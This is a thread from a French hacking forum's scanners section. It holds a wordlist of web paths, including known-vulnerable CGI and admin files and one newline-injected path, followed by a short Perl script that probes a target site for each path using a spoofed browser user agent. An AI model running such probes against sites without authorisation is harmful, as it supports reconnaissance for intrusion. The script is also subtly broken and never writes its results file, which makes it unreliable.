/bbv/
/bdata/
/bdatos/
/boot/
/caja/
/cards/
/cash/
/cd/
/cdrom/
/cert/
/certificado/
/certificate
/certificates
/client/
/cliente/
/clientes/
/clients/
/cm/
/communicator/
/compra/
/compras/
/compressed/
/conecta/
/connect/
/console
/correo/
/crypto/
/css
/cuenta/
/cuentas/
/dato/
/datos/
/demo/
/demos/
/dir/
/directory/
/ejemplo/
/ejemplos/
/envia/
/enviamail/
/es/
/Excel/
/excel/
/EXE/
/fbsd/
/fileadmin/
/forums/
/foto/
/fotos/
/gfx/
/global/
/graphics/
/guest/
/homepage/
/imagenes/
/imgs/
/impreso/
/informacion/
/information/
/ingresa/
/ingreso/
/internal/
/invitado/
/invitados/
/job/
/jrun/
/js
/libro/
/lost+found/
/mbox
/message/
/messaging/
/movimientos/
/mqseries/
/MSword/
/Msword/
/msword/
/NetDynamic/
/NetDynamics/
/netscape/
/new
/news
/nl/
/noticias/
/oracle
/oradata/
/Pages/
/phpmyadmin/
/phpMyAdmin/
/pics/
/pix/
/poll
/polls
/privado/
/prod/
/prueba/
/pruebas/
/publica/
/publicar/
/publico/
/python/
/sample/
/samples/
/save/
/scr/
/scratch
/service/
/services/
/servicio/
/servicios/
/solaris/
/Sources/
/Statistics/
/subir/
/sun/
/swf
/tar/
/tarjetas/
/temporal/
/tests/
/tpv/
/trabajo/
/transito/
/trees/
/usuario/
/usuarios/
/webmaster_logs/
/windows/
/word/
/cgi-bin/rightfax/fuwww.dll/?
/cgi-bin/scripts/*%0a.pl
/database/db2000.mdb
/officescan/cgi/cgiChkMasterPwd.exe
/WebAdmin.dll
/WS_FTP.LOG
/localstart.asp


Revenir en haut
Publicité






MessagePosté le: Mer 6 Jan - 16:19 (2010)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Mass Trauma
Membre
Membre

Hors ligne

Inscrit le: 21 Nov 2009
Messages: 96

MessagePosté le: Mer 6 Jan - 16:42 (2010)    Sujet du message: CGIs Répondre en citant

Un ptit script Perl à associé avec cette liste pour obtenir un scanner de vulnérabilité HTTP minimaliste:

#!/usr/bin/perl
use strict;
use LWP::Simple qw($ua get);
        $ua = LWP::UserAgent->new;
        $ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.9');
my @found;

&usage unless @ARGV==3;
my $url = $ARGV[0];
my $dirlist = $ARGV[1];
my $results = $ARGV[2];

open(ifile, "<$dirlist") || die "Couldn't open file\n";
my @dirs =<ifile>;
close("ifile");
&search;

sub usage{
    print "Usage:\n";
    print "DirSpider.pl <url> <file of directories> <result file>\n";
    print "DirSpider.pl http://www.google.com dirs.txt found.txt\n";
    exit;
}

sub search{
        foreach my $dir(@dirs){
            print $url.$dir;
            my $response = $ua->get($url.$dir);
            if($response->status_line !~ m/^404/){
                push(@found,$url.$dir);
            }
        }
}


Revenir en haut
Contenu Sponsorisé






MessagePosté le: Aujourd’hui à 10:27 (2017)    Sujet du message: CGIs

Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> Scanners Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  

Index | Panneau d’administration | créer forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
HalloweenOclock © theme by larme d'ange 2006
Powered by phpBB © 2001, 2005 phpBB Group
Traduction par : phpBB-fr.com